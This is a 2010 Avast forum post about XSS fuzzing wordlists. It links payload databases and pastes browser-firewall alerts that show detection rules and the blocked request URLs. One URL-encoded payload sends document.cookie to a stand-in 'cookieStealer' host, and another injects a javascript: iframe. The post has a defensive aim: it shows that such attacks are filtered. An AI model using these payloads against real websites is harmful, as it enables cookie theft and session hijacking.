Author Topic: Pentest with wfuzz...  (Read 2714 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast √úberevangelist
  • Probably Bot
  • *****
  • Posts: 33810
  • malware fighter
Pentest with wfuzz...
« on: July 18, 2010, 09:20:41 PM »
Hi malware fighters,

link here: http://code.google.com/p/wfuzz/source/browse/trunk/wordlist/Injections/XSS.txt?r=2
and another database here: http://www.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&setlang=en
and here: http://airodump.net/xss-pentest-plugin-cross-site-scripting/
or here: http://www.allinfosec.com/2010/06/16/wowbb-1-7-xss-vulnerabilities-3/

All checked andf blocked by my firekeeper lists, example:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C%2FIFRAME%253E+%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2FcookieStealer%2Fcgi-bin%2Fcookie.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E&ie=utf-8&oe=utf-8&aq=t

and a good read: http://www.xc0re.net/index.php?p=1_10_Knowledge-Core
Mind you when it starts with " it does not work.....

Just one more example:
=== Triggered rule ===
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=%3Ciframe+src=%E2%80%9Djavascript:document.vulnerable=true;
NoScript alerts and filters this one out...

And they come in all devious forms, like:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=admin+anubis%257C%257C9f55c7e99c128fb18b0ce725a8c2bdea+%3Cscript%3E&ie=utf-8&oe=utf-8&aq=t


polonus
« Last Edit: July 19, 2010, 12:05:00 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!